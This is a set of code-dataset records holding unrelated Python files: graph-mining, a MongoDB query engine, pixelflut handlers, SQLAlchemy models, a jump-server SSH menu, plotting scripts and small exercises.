start_time\nprint(elapsed)\n","sub_path":"Programs/17-21/th.py","file_name":"th.py","file_ext":"py","file_size_in_byte":4747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"351167871","text":"import copy\nimport tracemalloc\n\nimport sys\nsys.setrecursionlimit(15000)\ntracemalloc.start()\nexternal_utility = dict()\n\nclass InputGraph:\n def __init__(self):\n self.vertices = []\n self.edges = []\n self.adjacency = dict()\n self.dfs_order = dict()\n self.time = 0\n\n def dfs_visit(self, u):\n self.dfs_order[u] = self.time\n self.time += 1\n try:\n _ = self.adjacency[u]\n except KeyError:\n return\n for v in self.adjacency[u]:\n if self.dfs_order[v] == -1:\n self.dfs_visit(v)\n\n def __repr__(self) -> str:\n return \"\\nVertices:\" + str(self.vertices) + \"\\nEdges: \" + str(self.edges) \\\n + \"\\nDFS order: \" + str(self.dfs_order) + \"\\nAdjacency List: \" + str(self.adjacency) + \"\\n\"\n\n\nclass Graph:\n def __init__(self):\n self.vertices = dict()\n self.adjacency = dict()\n self.utility = -float('inf')\n\n def graph_utility(self):\n if self.utility > -float('inf'):\n return self.utility\n utility = 0.0\n for u in self.adjacency:\n for e in self.adjacency[u]:\n v, edge_label, internal_utility = e\n if u > v:\n continue\n u_label = self.vertices[u]\n v_label = self.vertices[v]\n if u_label <= v_label:\n utility += internal_utility * external_utility[(u_label, v_label, edge_label)]\n else:\n utility += internal_utility * external_utility[(v_label, u_label, edge_label)]\n self.utility = utility\n return utility\n\n def __repr__(self) -> str:\n return \"\\nVertices:\" + str(self.vertices) \\\n + \"\\nAdjacency List: \" + str(self.adjacency) + \"\\n\"\n\n\ninput_graphs =[]\n\nfile = open(\"NCI1log.txt\").readlines()\nmode = -1\nfor line in file:\n if line[0] == 't':\n mode += 1\n input_graphs.append(InputGraph())\n continue\n elif mode == -1:\n vertex1, vertex2, edge, utility = line.split(\" \")\n vertex1 = int(vertex1)\n vertex2 = int(vertex2)\n edge = int(edge)\n utility = float(utility)\n external_utility[(vertex1, vertex2, edge)] = utility\n elif line[0] == 'v':\n _, vertex, label = line.split(\" \")\n vertex = int(vertex)\n label = int(label)\n input_graphs[mode].vertices.append((vertex,label))\n input_graphs[mode].dfs_order[vertex] = -1\n elif line[0] == 'e':\n _, vertex1, vertex2, label, utility = line.split(\" \")\n vertex1 = int(vertex1)\n vertex2 = int(vertex2)\n label = int(label)\n utility = float(utility)\n if vertex1 in input_graphs[mode].adjacency:\n input_graphs[mode].adjacency[vertex1].append(vertex2)\n else:\n input_graphs[mode].adjacency[vertex1] = [vertex2]\n if vertex2 in input_graphs[mode].adjacency:\n input_graphs[mode].adjacency[vertex2].append(vertex1)\n else:\n input_graphs[mode].adjacency[vertex2] = [vertex1]\n\n input_graphs[mode].edges.append((vertex1, vertex2, label, utility))\n\n\ngraphs = []\ncc=1\nfor g in input_graphs:\n print(cc)\n cc+=1\n for v, _ in g.vertices:\n if g.dfs_order[v] == -1:\n g.dfs_visit(v)\n graph = Graph()\n for v in g.vertices:\n graph.vertices[g.dfs_order[v[0]]] = v[1]\n for e in g.edges:\n if g.dfs_order[e[0]] in graph.adjacency:\n graph.adjacency[g.dfs_order[e[0]]].append((g.dfs_order[e[1]], e[2], e[3]))\n else:\n graph.adjacency[g.dfs_order[e[0]]] = [(g.dfs_order[e[1]], e[2], e[3])]\n if g.dfs_order[e[1]] in graph.adjacency:\n graph.adjacency[g.dfs_order[e[1]]].append((g.dfs_order[e[0]], e[2], e[3]))\n else:\n graph.adjacency[g.dfs_order[e[1]]] = [(g.dfs_order[e[0]], e[2], 
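# Each InputGraph is rewritten here as a Graph whose vertex ids are DFS
# discovery indices, giving the mining code a contiguous 0..n-1 labelling;
# every adjacency entry is a (neighbour, edge_label, internal_utility) triple.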
e[3])]\n    graphs.append(graph)\n\nmin_util = 0.0\nfor g in graphs:\n    min_util += g.graph_utility()\n    print(g.graph_utility())\nmin_util *= 0.09\nprint(\"----------------------------------\")\nprint(min_util)\n\ndef RightMostPath(code):\n    adj = dict()\n    ur = 0\n    for c in code:\n        ur = max(ur, c[0])\n        ur = max(ur, c[1])\n        if c[1] > c[0]:\n            adj[c[1]] = c[0]\n    result = [ur]\n    u = ur\n    while u != 0:\n        u = adj[u]\n        result.append(u)\n    return ur, list(reversed(result))\n\n\ndef get_utility(code, graph, isomorphism):\n    result = 0.0\n    for c in code:\n        ext_utility = 0.0\n        u, v, u_label, v_label, edge_label = c\n        if u_label < v_label:\n            ext_utility = external_utility[(u_label, v_label, edge_label)]\n        else:\n            ext_utility = external_utility[(v_label, u_label, edge_label)]\n        iso_u, iso_v = isomorphism[u], isomorphism[v]\n        int_utility = 0.0\n        for e in graph.adjacency[iso_u]:\n            if e[0] == iso_v and e[1] == edge_label:\n                int_utility = e[2]\n        result += ext_utility*int_utility\n    return result\n\n\ndef RightMostExtensions(code, graphs):\n    result = dict()\n    for i in range(len(graphs)):\n        graph = graphs[i]\n        temp_result = dict()\n        if len(code) == 0:\n            for u in graph.adjacency:\n                for e in graph.adjacency[u]:\n                    v, edge_label, internal_utility = e\n                    u_label = graph.vertices[u]\n                    v_label = graph.vertices[v]\n                    utility = 0.0\n                    if u_label < v_label:\n                        utility = internal_utility * external_utility[(u_label, v_label, edge_label)]\n                    else:\n                        utility = internal_utility * external_utility[(v_label, u_label, edge_label)]\n                    if (0, 1, u_label, v_label, edge_label) in temp_result:\n                        temp_result[(0, 1, u_label, v_label, edge_label)] = max(utility, temp_result[(0, 1, u_label, v_label, edge_label)])\n                    else:\n                        temp_result[(0, 1, u_label, v_label, edge_label)] = utility\n        else:\n            isomorphisms = subgraphIsomorphisms(code, graph)\n            u, R = RightMostPath(code)\n            for isomorphism in isomorphisms:\n                for v in R:\n                    if u == v:\n                        continue\n                    iso_u = isomorphism[u]\n                    iso_v = isomorphism[v]\n                    for e in graph.adjacency[iso_u]:\n                        if e[0] != iso_v:\n                            continue\n                        edge_label = e[1]\n                        exists = False\n                        for c in code:\n                            if c[0] == u and c[1] == v and c[4] == edge_label:\n                                exists = True\n                            elif c[0] == v and c[1] == u and c[4] == edge_label:\n                                exists = True\n                        if not exists:\n                            new_code = copy.deepcopy(code)\n                            new_code.append((u, v, graph.vertices[iso_u], graph.vertices[iso_v], edge_label))\n                            utility = get_utility(new_code, graph, isomorphism)\n                            # the membership test and the max() lookup must use the same\n                            # (u, v, u_label, v_label, edge_label) key as the assignment\n                            if (u, v, graph.vertices[iso_u], graph.vertices[iso_v], edge_label) in temp_result:\n                                temp_result[(u, v, graph.vertices[iso_u], graph.vertices[iso_v], edge_label)] = max(utility, temp_result[(u, v, graph.vertices[iso_u], graph.vertices[iso_v], edge_label)])\n                            else:\n                                temp_result[(u, v, graph.vertices[iso_u], graph.vertices[iso_v], edge_label)] = utility\n                ur = u\n                for u in R:\n                    iso_u = isomorphism[u]\n                    for e in graph.adjacency[iso_u]:\n                        iso_v, edge_label, int_utility = e\n                        if iso_v in isomorphism.values():\n                            continue\n                        u_label, v_label = graph.vertices[iso_u], graph.vertices[iso_v]\n                        new_code = copy.deepcopy(code)\n                        new_code.append((u, ur + 1, u_label, v_label, edge_label))\n                        isomorphism_ = copy.deepcopy(isomorphism)\n                        isomorphism_[ur + 1] = iso_v\n                        utility = get_utility(new_code, graph, isomorphism_)\n                        if (u, ur+1, u_label, v_label, edge_label) in temp_result:\n                            temp_result[(u, ur+1, u_label, v_label, edge_label)] = max(utility,temp_result[(u, ur+1, u_label, v_label, edge_label)])\n                        else:\n                            temp_result[(u, ur+1, u_label, v_label, edge_label)] = utility\n\n        for key in temp_result:\n            if key in result:\n                utility, gwu =
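# This merge accumulates two numbers per extension tuple: the summed
# best-per-graph utility, and the graph-weighted utility (GWU), i.e. the total
# utility of every graph supporting the extension. GWU can only shrink as a
# pattern grows (its supporting set shrinks), which is why GSpan's
# `gwu > min_util` test works as a safe pruning bound.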
result[key]\n result[key] = (temp_result[key] + utility, gwu + graph.graph_utility())\n else:\n result[key] = (temp_result[key], graph.graph_utility())\n return result\n\n\ndef buildGraph(code):\n graph = Graph()\n for tuple in code:\n u, v, u_label, v_label, edge_label = tuple\n graph.vertices[u] = u_label\n graph.vertices[v] = v_label\n if u in graph.adjacency:\n graph.adjacency[u].append((v, edge_label, 0.0))\n else:\n graph.adjacency[u] = [(v, edge_label, 0.0)]\n if v in graph.adjacency:\n graph.adjacency[v].append((u, edge_label, 0.0))\n else:\n graph.adjacency[v] = [(u, edge_label, 0.0)]\n return graph\n\n\ndef minTuple(tuple1, tuple2):\n u1, v1, u1_label, v1_label, edge1label = tuple1\n u2, v2, u2_label, v2_label, edge2label = tuple2\n if u1 == u2 and v1 == v2:\n if u1_label < u2_label:\n return tuple1\n elif u1_label > u2_label:\n return tuple2\n elif v1_label < v2_label:\n return tuple1\n elif v1_label > v2_label:\n return tuple2\n elif edge1label < edge2label:\n return tuple1\n return tuple2\n else:\n if u1 < v1 and u2 < v2: # both forward edge\n if v1 < v2:\n return tuple1\n elif v1 == v2 and u1 > u2:\n return tuple1\n return tuple2\n if u1 > v1 and u2 > v2: # both backward edge\n if u1 < u2:\n return tuple1\n elif u1 == u2 and v1 < v2:\n return tuple1\n return tuple2\n if u1 < v1 and u2 > v2: # tuple1 forward tuple2 backward\n if v1 <= u2:\n return tuple1\n return tuple2\n if u1 > v1 and u2 < v2: # tuple1 backward tuple2 forward\n if u1 < v2:\n return tuple1\n return tuple2\n\n\ndef minExtension(tuples):\n result = None\n for t in tuples:\n if result is None:\n result = t\n else:\n result = minTuple(result, t)\n return result\n\n\ndef isCannonical(code):\n graph = buildGraph(code)\n c = []\n for i in range(len(code)):\n extension = minExtension(RightMostExtensions(c, [graph]))\n if minTuple(extension, code[i]) != code[i]:\n return False\n c.append(extension)\n return True\n\n\ndef subgraphIsomorphisms(code, graph):\n isomorphisms = []\n l0 = code[0][2]\n for v in graph.vertices:\n if graph.vertices[v] == l0:\n isomorphisms.append({0: v})\n for tuple in code:\n u, v, u_label, v_label, edge_label = tuple\n temp_isomorphisms = []\n for isomorphism in isomorphisms:\n if v > u:\n iso_u = isomorphism[u]\n try:\n _ = graph.adjacency[iso_u]\n except KeyError:\n continue\n for e in graph.adjacency[iso_u]:\n iso_v, iso_edge_label, _ = e\n if iso_v not in isomorphism.values() and graph.vertices[iso_v] == v_label and edge_label == iso_edge_label:\n new_iso = copy.deepcopy(isomorphism)\n new_iso[v] = iso_v\n temp_isomorphisms.append(new_iso)\n else:\n iso_u = isomorphism[u]\n iso_v = isomorphism[v]\n for e in graph.adjacency[iso_u]:\n c_iso_v, c_iso_edge_label, _ = e\n if c_iso_v == iso_v and edge_label == c_iso_edge_label:\n temp_isomorphisms.append(copy.deepcopy(isomorphism))\n isomorphisms = temp_isomorphisms\n return isomorphisms\n\nimport time\n\nhup, candidates= 0, 0\ndef GSpan(code, graphs, min_util, t):\n global hup, candidates\n code = copy.deepcopy(code)\n extentions = RightMostExtensions(code, graphs)\n for key in extentions:\n utility, gwu = extentions[key]\n new_code = copy.deepcopy(code)\n new_code.append(key)\n print(time.time()-t)\n if isCannonical(new_code) and gwu > min_util:\n if utility > min_util:\n print(new_code, utility, gwu, isCannonical(new_code))\n hup += 1\n GSpan(new_code, graphs, min_util, t)\n\n\nt = time.time()\nGSpan([], graphs, min_util, t)\nprint(\" \", time.time() - t, hup, candidates)\ncurrent, peak = tracemalloc.get_traced_memory()\nprint(f\"Current 
memory usage is {current / 10**6}MB; Peak was {peak / 10**6}MB\")\ntracemalloc.stop()\nprint(5)","sub_path":"main GWU.py","file_name":"main GWU.py","file_ext":"py","file_size_in_byte":13408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"627752664","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"Demonstrate returning multiple values from a function.\"\"\"\n\nimport math\n\n\ndef move(x_x0_, y_y0_, step, angle=0):\n    \"\"\"Move a point and return its new coordinates.\n    Keyword arguments:\n    step -- the distance to move\n    angle -- the direction in radians (default 0); the y axis points down, as on a screen\n    \"\"\"\n    n_x0_ = x_x0_ + step * math.cos(angle)\n    n_y0_ = y_y0_ - step * math.sin(angle)\n    return n_x0_, n_y0_\n\n\nA_A0_, B_B0_ = move(100, 100, 60, math.pi / 6)\nprint(A_A0_, B_B0_)\n","sub_path":"Python/src/Demo/fun/multi_return_value_test.py","file_name":"multi_return_value_test.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"542330854","text":"\"\"\"\nNatural numbers according to 'ISO 80000-2:2009(E)\npart 2: Mathematical signs and symbols to be used in the natural sciences and technology'\nN = {0,1,2,3...}\n\"\"\"\nimport math\n\n#Welcome message\nprint('''\n* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *\nHello, if you enter two numbers below I'll count the sum\nof all Natural numbers between them.\nType GO if you want to continue.\nType NOPE if you want to exit the program.\n(Please note that you can type NOPE anytime you'd like to exit)\n* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *\n''')\nnum_1 = None\nnum_2 = None\ndes = 0 #tracks which step we are at - needed so the 'NOPE' command works everywhere :)\nty = 'Thank you.'\nnope = 'NOPE'\nokay_msg = 'Okay, maybe next time...'\nnot_num_msg = 'Seems it\\'s not a number, try again'\nsum_nat = 0\n\nwhile des == 0:\n    go_msg = input('Make your choice >>> ')\n    if go_msg.upper() == 'GO':\n        # Go to count!\n        des = 1\n        print('Perfect, now enter numbers!')\n\n        while des == 1:\n            # Check if 1st input is correct\n            num_1 = input('Put here your first number >>> ').strip()\n            if num_1:\n                num_1_checker = (num_1.replace('.','',1))[0].replace('-','') + num_1.replace('.','',1)[1:]\n                if num_1_checker.isnumeric():\n                    print(ty)\n                    des = 2\n\n                    while des == 2:\n                        # Check if 2nd input is correct\n                        num_2 = input('And another number >>> ').strip()\n\n                        if num_2:\n                            num_2_checker = (num_2.replace('.','',1))[0].replace('-','') + num_2.replace('.','',1)[1:]\n\n                            if num_2_checker.isnumeric():\n                                des = 3\n                                # Check which number is larger (numerically, not as strings)\n                                num_1_m = min(num_1, num_2, key=float)\n                                num_2_m = max(num_1, num_2, key=float)\n\n                                # Round the bounds inward to the nearest Integers\n                                num_1_r = math.ceil(float(num_1_m))\n                                num_2_r = math.floor(float(num_2_m))\n\n                                # Check if there can be any Natural numbers between the 2 inputs\n                                if num_1_r > num_2_r:\n                                    print(f'Seems there are no Natural numbers between {num_1} and {num_2}')\n                                    break\n\n                                # Count the sum of all Natural numbers between num_1 and num_2\n                                for i in range(num_1_r, num_2_r+1):\n\n                                    if i >= 0:\n                                        sum_nat += i\n                                print(ty)\n                                print(f'Result: the sum of all Natural numbers between {num_1} and {num_2} is {sum_nat}')\n\n                            elif num_2.upper() == nope:\n                                print(okay_msg)\n                                break\n                            else:\n                                print(not_num_msg)\n\n            elif num_1.upper() == nope:\n                print(okay_msg)\n                break\n            else:\n                print(not_num_msg)\n\n    elif go_msg.upper() == nope:\n        print(okay_msg)\n        break\n\n    else:\n        print('Sorry, I can\'t
understand you.')\n","sub_path":"base/hw/hw_2_1.py","file_name":"hw_2_1.py","file_ext":"py","file_size_in_byte":3518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"141249145","text":"import logging\nlog = logging.getLogger('brain')\n\nlog.debug('lol')\n\nticks = 0\n\n\n@on('RESIZE')\ndef resize(canvas):\n global log\n log.debug('resize event')\n\n\n@on('QUIT')\ndef quit(canvas):\n global log\n log.debug('quit event')\n\n\n@on('TICK')\ndef tick(canvas):\n global log\n global ticks\n if ticks % 50 == 0:\n print('.')\n ticks += 1\n\n\n@on('CONNECT')\ndef connect(canvas, client):\n global log\n log.debug('connect event %s', client)\n\n\n@on('DISCONNECT')\ndef disconnect(canvas, client):\n global log\n log.debug('disconnect event %s', client)\n\n\n@on('COMMAND-PX')\ndef command_px(canvas, client, *args):\n global log\n log.debug('px command event %s %s', client, args)\n assert len(args) == 3\n\n x, y, c = args\n c = c.lower().strip('#')\n\n assert x.isdecimal()\n assert y.isdecimal()\n assert 6 <= len(c) <= 8\n\n # pad optional alpha\n c += 'f' * (8 - len(c))\n\n x, y = int(x), int(y)\n r, g, b, a = tuple(int(c[i:i+2], 16) for i in (0, 2, 4, 6))\n\n canvas.set_pixel(x, y, r, g, b, a)\n return True\n\n\n@on('COMMAND-WL')\ndef command_wl(canvas, client, *args):\n import base64\n global log\n log.debug(\"wl command event %s %d args\", client, len(args))\n w, h = canvas.size\n raw_size = w * h * canvas.depth\n b64_size = int(raw_size + raw_size/3)\n assert len(args) == 1\n base = args[0]\n assert len(base) == b64_size\n data = base64.b64decode(base)\n assert len(data) == w * h * canvas.depth\n\n for y in range(h):\n for x in range(w):\n p = (y*w + x) * 3\n canvas.set_pixel(x, y, data[p], data[p+1], data[p+2], 0xff)\n return True\n","sub_path":"pixelflut/canvas_brain.py","file_name":"canvas_brain.py","file_ext":"py","file_size_in_byte":1636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"166810118","text":"from openpatch_core.database import db, gt\nfrom openpatch_core.models import Base\nfrom openpatch_core.database.types import GUID\nfrom sqlalchemy import func\nfrom sqlalchemy.ext.orderinglist import ordering_list\nimport uuid\n\n\nclass ItemTask(Base):\n __tablename__ = gt(\"item_task\")\n\n id = db.Column(GUID(), primary_key=True, default=uuid.uuid4)\n version = db.Column(db.Integer)\n item_id = db.Column(GUID())\n task = db.Column(db.Text)\n text = db.Column(db.JSON)\n format_type = db.Column(db.String(60))\n format_version = db.Column(db.Integer)\n data = db.Column(db.JSON)\n evaluation = db.Column(db.JSON)\n position = db.Column(db.Integer)\n\n __table_args__ = (\n db.ForeignKeyConstraint(\n [\"version\", \"item_id\"],\n [\n \"{}.version\".format(gt(\"item_version\")),\n \"{}.item_id\".format(gt(\"item_version\")),\n ],\n ),\n {},\n )\n item_version = db.relationship(\n \"ItemVersion\",\n primaryjoin=\"and_(ItemTask.version==ItemVersion.version, ItemTask.item_id==ItemVersion.item_id)\",\n viewonly=True,\n )\n\n def copy(self):\n item_task = ItemTask(\n task=self.task,\n text=self.text,\n format_type=self.format_type,\n format_version=self.format_version,\n data=self.data,\n evaluation=self.evaluation,\n )\n return item_task\n\n\nclass ItemVersion(Base):\n __tablename__ = gt(\"item_version\")\n\n member_id = db.Column(GUID(), db.ForeignKey(\"{}.id\".format(gt(\"member\"))))\n version = db.Column(db.Integer, primary_key=True)\n version_message = db.Column(db.Text)\n status = 
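# ItemVersion is keyed by the composite primary key (version, item_id); ItemTask
# rows above point back at it through a composite ForeignKeyConstraint, and the
# `latest` flag defined just below is what get_latest() filters on.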
db.Column(db.String(20))\n latest = db.Column(db.Boolean)\n\n item_id = db.Column(\n GUID, db.ForeignKey(\"{}.id\".format(gt(\"item\"))), primary_key=True\n )\n item = db.relationship(\"Item\", back_populates=\"versions\")\n\n tasks = db.relationship(\n \"ItemTask\",\n order_by=\"ItemTask.position\",\n collection_class=ordering_list(\"position\"),\n )\n member = db.relationship(\"Member\", back_populates=\"item_versions\")\n\n @classmethod\n def get_draft(cls, item_id):\n return cls.query.filter_by(item_id=item_id, status=\"draft\").first()\n\n def copy(self):\n latest_version = (\n db.session.query(func.max(ItemVersion.version))\n .filter(ItemVersion.item == self.item)\n .scalar()\n )\n item_version = ItemVersion(\n member=self.member,\n version=latest_version + 1,\n version_message=self.version_message,\n status=self.status,\n item=self.item,\n latest=self.latest,\n )\n\n for task in self.tasks:\n item_version.tasks.append(task.copy())\n\n return item_version\n\n @classmethod\n def get_latest(cls, item_id):\n return cls.query.filter_by(item_id=item_id, latest=True).first()\n\n def permitted_write(self, jwt_claims):\n return self.item.permitted_write(jwt_claims)\n\n def permitted_read(self, jwt_claims):\n return self.item.permitted_read(jwt_claims)\n","sub_path":"openpatch_itembank/models/item_version.py","file_name":"item_version.py","file_ext":"py","file_size_in_byte":3132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"629129443","text":"import csv\nimport os\nimport shutil\n\n\ndir = r\"annotations-csv/\"\nlist = os.listdir(dir)\n\nflag = 0\n\nfor i in range(0,len(list)): #len(list)\n file_name_no_ext = list[i].rstrip('.csv')\n print(file_name_no_ext)\n path = os.path.join(dir,list[i])\n if os.path.isfile(path):\n out = open(path,'r')\n read_csv = csv.reader(out,dialect='excel')\n for line in read_csv: #循环输出csv中的所有数据\n if flag == 0:\n flag = flag + 1\n continue\n flag = flag + 1\n if flag > 1:\n shutil.copyfile(path, r\"all-have-apples/annotations-csv/\"+file_name_no_ext+'.csv')\n shutil.copyfile(r\"images/\"+file_name_no_ext+'.png', r\"all-have-apples/images/\"+file_name_no_ext+'.png')\n flag = 0\n out.close()\nprint(len(list))","sub_path":"assets/python_scripts/remove-noApples.py","file_name":"remove-noApples.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"573364788","text":"# -*- coding: UTF-8 -*-\nimport re\nimport pymongo\nimport logging\nimport traceback\nimport json\n\nfrom . 
import EngineBase\nfrom .models import ResultSet\nfrom bson import json_util\nfrom pymongo.errors import OperationFailure\n\n__author__ = 'jackie'\n\nlogger = logging.getLogger('default')\n\n\nclass MongoEngine(EngineBase):\n    def get_connection(self, db_name=None):\n        self.db_name = self.db_name or 'admin'\n        conn = pymongo.MongoClient(self.host, self.port, authSource=self.db_name, connect=True, connectTimeoutMS=10000)\n        if self.user and self.password:\n            conn[self.db_name].authenticate(self.user, self.password, self.db_name)\n        return conn\n\n    @property\n    def name(self): # pragma: no cover\n        return 'Mongo'\n\n    @property\n    def info(self): # pragma: no cover\n        return 'Mongo engine'\n\n    def get_all_databases(self):\n        result = ResultSet()\n        conn = self.get_connection()\n        try:\n            result.rows = conn.list_database_names()\n        except OperationFailure:\n            result.rows = [self.db_name]\n        return result\n\n    def get_all_tables(self, db_name, **kwargs):\n        result = ResultSet()\n        conn = self.get_connection()\n        db = conn[db_name]\n        result.rows = db.list_collection_names()\n        return result\n\n    def get_all_columns_by_tb(self, db_name, tb_name, **kwargs):\n        \"\"\"Fetch all field names of a collection; returns a ResultSet\"\"\"\n        # https://github.com/getredash/redash/blob/master/redash/query_runner/mongodb.py\n        result = ResultSet()\n        db = self.get_connection()[db_name]\n        collection_name = tb_name\n        documents_sample = []\n        if \"viewOn\" in db[collection_name].options():\n            for d in db[collection_name].find().limit(2):\n                documents_sample.append(d)\n        else:\n            for d in db[collection_name].find().sort([(\"$natural\", 1)]).limit(1):\n                documents_sample.append(d)\n\n            for d in db[collection_name].find().sort([(\"$natural\", -1)]).limit(1):\n                documents_sample.append(d)\n        columns = []\n        # _merge_property_names\n        for document in documents_sample:\n            for prop in document:\n                if prop not in columns:\n                    columns.append(prop)\n        result.column_list = ['COLUMN_NAME']\n        result.rows = columns\n        return result\n\n    def describe_table(self, db_name, tb_name, **kwargs):\n        \"\"\"Describe a collection; returns a query-like ResultSet\"\"\"\n        result = self.get_all_columns_by_tb(db_name=db_name, tb_name=tb_name)\n        result.rows = [[[r], ] for r in result.rows]\n        return result\n\n    def query_check(self, db_name=None, sql=''):\n        \"\"\"Validate the statement before the query is executed\"\"\"\n        result = {'msg': '', 'bad_query': True, 'filtered_sql': sql, 'has_star': False}\n        safe_cmd = ['find']\n        sql = sql.split('.')[1]\n        for cmd in safe_cmd:\n            if re.match(fr'^{cmd}\\(.*', sql.strip(), re.I):\n                result['bad_query'] = False\n                break\n        if result['bad_query']:\n            result['msg'] = 'This command is not allowed! The correct format is: {collection_name}.find() or ' \\\n                            '{collection_name}.find(expression), e.g. test.find({\"id\":{\"$gt\":1.0}})'\n        return result\n\n    def query(self, db_name=None, sql='', limit_num=0, close_conn=True, **kwargs):\n        result_set = ResultSet(full_sql=sql)\n        try:\n            conn = self.get_connection()\n            db = conn[db_name]\n            collect = db[sql.split('.')[0]]\n            match = re.compile(r'[(](.*)[)]', re.S)\n            sql = re.findall(match, sql)[0]\n            if sql != '':\n                sql = json.loads(sql)\n                result = collect.find(sql).limit(limit_num)\n            else:\n                # no filter expression given: match all documents\n                result = collect.find().limit(limit_num)\n            rows = json.loads(json_util.dumps(result))\n            result_set.column_list = ['Result']\n            if isinstance(rows, list):\n                result_set.rows = tuple([json.dumps(x, ensure_ascii=False)] for x in rows)\n                result_set.affected_rows = len(rows)\n        except Exception as e:\n            logger.warning(f\"Mongo command failed. Statement: {sql}, error: {traceback.format_exc()}\")\n            result_set.error = str(e)\n        return
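# A minimal usage sketch of the flow above (hypothetical values; assumes the
# EngineBase constructor supplies the host/port/user/password attributes that
# get_connection() reads):
#     engine = MongoEngine(...)  # constructed however EngineBase expects
#     check = engine.query_check(db_name='test', sql='users.find({"age": {"$gt": 21}})')
#     if not check['bad_query']:
#         rs = engine.query(db_name='test', sql='users.find({"age": {"$gt": 21}})', limit_num=10)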
result_set\n","sub_path":"sql/engines/mongo.py","file_name":"mongo.py","file_ext":"py","file_size_in_byte":4353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"255892483","text":"import pandas as pd \nimport numpy as np\n\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\n\nx = pd.read_csv('RMSEs/keras_RMSE.csv', index_col=0).reset_index(drop=True)\n\nplt.figure()\nplt.plot(x['range'], x['val'], 'x')\n\nx = pd.read_csv('keras_RMSE.csv', index_col=0).reset_index(drop=True)\n\n\nprint(np.corrcoef(x['range'], x['val'])[1, 0])\n\n\n\n\ndef boxplots(opt, x):\n opts = np.unique(x[opt])\n \n for ep in ['cal', 'val']: \n dt = pd.DataFrame()\n for i in opts:\n sub = x[x[opt] == i][ep]\n sub.name = i\n sub.index = range(sub.shape[0])\n \n dt = pd.concat([dt, sub], axis=1)\n\n plt.figure(figsize=(10,8), dpi=200)\n dt.boxplot(grid=False, rot=45)\n plt.savefig('post/'+opt+'_'+ep+'.jpg')\n plt.close()\n\n\ncolnames = list(map(str, x.columns))\ncolnames.remove('cal')\ncolnames.remove('val')\n\nfor opt in colnames:\n boxplots(opt, x)\n \n \n \n \ndef plots(opt, x):\n fig, (ax1, ax2) = plt.subplots(1, 2, sharey=True, figsize=(10, 6), dpi=200)\n \n ax1.plot(x[opt], x['cal'], 'x')\n ax1.set_title('cal')\n ax1.set_ylabel('RMSE')\n ax1.set_xlabel(opt)\n ax2.plot(x[opt], x['val'], 'x')\n ax2.set_title('val')\n \n fig.savefig('post_plots/'+opt+'.jpg')\n plt.close()\n\n\nfor opt in x.columns:\n plots(opt, x)\n\n \n \n\nbest = x.sort_values('val')\nbest.to_csv('out_pres/RMSE_table.csv', index=False)\nbest = best.iloc[:10]\n","sub_path":"zzz_scripts/post_paper.py","file_name":"post_paper.py","file_ext":"py","file_size_in_byte":1465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"497864998","text":"from backend import models\nfrom django.contrib.auth import authenticate\nfrom jump_king.lib import demo\nclass Ssh_handler(object):\n def auth(self):\n count=0\n while count <=3:\n username=input('用户名:>>')\n password=input('密码:>>')\n user=authenticate(username=username,password=password)\n if user:\n self.user=user\n count=0\n return True\n else:\n count +=1\n continue\n else:\n return False\n\n def host_list(self):\n if self.auth():\n while True:\n groups=self.user.host_groups.all()\n print('你所能操作的服务器组:')\n for index,group in enumerate(groups):\n print('[%s] ---- %s'%(index,group))\n print('输入Z显示未分组主机:>>')\n choice=input('请选择要操作的组:>>').strip()\n if choice == 'Z' or choice == 'z':\n group=self.user\n else:\n choice=int(choice)\n group=groups[choice]\n while True:\n try:\n for index,host in enumerate(group.host_to_remote_users.all()):\n print('[%s] ---- %s'%(index,host))\n print('输入b返回上级菜单')\n choice=input('请选择要操作的主机:>>').strip()\n if choice == 'b':\n break\n choice=int(choice)\n host=group.host_to_remote_users.all()[choice]\n self.user.auditlog=models.Audit_Log\n demo.start_connect(user_obj=self.user,host=host)\n\n except Exception:\n print('输入错误')\n\n\n\n\n else:\n print('认证失败')\n","sub_path":"jump_king/lib/ssh_interactive.py","file_name":"ssh_interactive.py","file_ext":"py","file_size_in_byte":1983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"178949291","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# @Author: Homer\n# Date: 2018-05-15\n# Version: 0.3\n# ELK\n\n\nimport os, json, time, datetime, argparse\nfrom multiprocessing import Process, JoinableQueue, Lock, Manager\n\nimport pandas as pd\nfrom pandas.io.json 
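# Note: pandas.io.json.json_normalize was deprecated in pandas 1.0; on newer
# pandas this import would be `from pandas import json_normalize`. It is left
# as-is here on the assumption that the original environment pinned an older pandas.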
